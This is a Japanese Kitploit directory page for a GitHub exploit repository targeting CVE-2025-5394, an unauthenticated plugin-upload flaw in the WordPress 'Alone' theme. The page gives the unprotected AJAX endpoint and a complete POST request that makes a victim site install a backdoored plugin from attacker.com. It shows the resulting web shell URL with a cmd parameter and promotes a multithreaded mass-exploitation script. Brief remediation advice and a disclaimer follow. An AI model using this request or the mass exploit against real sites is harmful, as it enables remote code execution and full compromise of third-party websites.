Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-5394 — Alone – チャリティ・多目的・非営利向けWordPressテーマ <= 7.8.3 - プラグインインストールを介した認証欠如による未認証の任意ファイルアップロード | Kitploit
ツール/GitHubGitHub/yucaerin/cve-2025-5394
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubyucaerin/cve-2025-5394

CVE-2025-5394

Alone – チャリティ・多目的・非営利向けWordPressテーマ <= 7.8.3 - プラグインインストールを介した認証欠如による未認証の任意ファイルアップロード

リポジトリを見る
1311年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-5394 – WordPress Alone テーマ <= 7.8.3 - プラグインインストール経由の未認証の任意ファイルアップロード

🔥 脆弱性概要
WordPress テーマ Alone のバージョン <= 7.8.3 には、未認証の任意ファイルアップロード の脆弱性があります。この欠陥により、未認証の攻撃者 が保護されていない AJAX エンドポイントを介してリモート URL から任意のプラグイン ZIP ファイルをアップロード・インストールできるようになり、バックドア化されたプラグインを展開することで リモートコード実行(RCE) につながります。

この脆弱性は、認証や権限チェックなしに wp_ajax_nopriv_ を介して公開されている beplus_import_pack_install_plugin 関数に起因します。この関数は、ユーザーが指定した URL からプラグインをインストールして有効化します。

🔍 影響を受けるテーマ

  • テーマ名: Alone – チャリティ多目的非営利 WordPress テーマ
  • 影響を受けるバージョン: <= 7.8.3
  • 脆弱性の種類: 未認証の任意ファイルアップロード → RCE
  • CVE ID: CVE-2025-5394
  • CVSS スコア: 9.8(Critical)
  • 影響: 完全なリモートコード実行(RCE)とサイト全体の完全な侵害

🧪 エクスプロイトの特徴

  • 🔓 認証不要
  • 📦 リモート URL から直接悪意のあるプラグイン ZIP をアップロード
  • 🚀 プラグインを自動的にインストールして有効化
  • 🐚 プラグイン内に埋め込まれた PHP によるウェブシェル配信に対応
  • ✅ 未認証ユーザーがアクセス可能な AJAX エンドポイント: /wp-admin/admin-ajax.php?action=beplus_import_pack_install_plugin

🧠 研究者

  • クレジット: Thai An

🚀 使用方法

  1. 管理下のサーバーにホストした悪意のあるプラグイン ZIP ファイルを用意します。

    • 有効なプラグインヘッダー(Plugin Name:)と PHP バックドア(例: bk.php)を含める必要があります。
  2. 以下の POST リクエストを作成します:

    root@kitploit:~
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: victim.com
    Content-Type: application/x-www-form-urlencoded
    
    action=beplus_import_pack_install_plugin&
    data[plugin_slug]=hello-dolly&
    data[plugin_source]=https://attacker.com/hello-dolly.zip
    
  3. 成功すると、プラグインがインストール・有効化されます。以下の場所でシェルにアクセスします:

    root@kitploit:~
    https://victim.com/wp-content/plugins/hello-dolly/bk.php?cmd=id
    

🧰 一括エクスプロイトスクリプト このリポジトリには、以下の機能を備えた一括エクスプロイトツールが含まれています:

  • マルチスレッド処理
  • 自動 HTTPS プレフィックス付与(欠落している場合)
  • 成功したターゲットの result.txt へのリアルタイムログ記録

詳細は mass_beplus_exploit.py を参照してください。

🛠 修正の推奨事項

  • テーマの作者は wp_ajax_nopriv_beplus_import_pack_install_plugin フックを削除または保護する必要があります。
  • 認証・権限チェックを実装します(例: current_user_can('install_plugins'))
  • プラグインのソースを検証・制限します。
  • Web アプリケーションファイアウォール(WAF)を使用して、不正な admin-ajax アクセスをブロックします。

🔒 免責事項:
この情報は、教育目的および許可されたセキュリティテストの目的でのみ提供されます。コンピュータシステムへの不正アクセスまたは不正使用は違法かつ非倫理的です。

📚 リファレンス:

  • Wordfence 勧告 – CVE-2025-5394

CVE: CVE-2025-5394
研究者: Thai An

ツールをダウンロード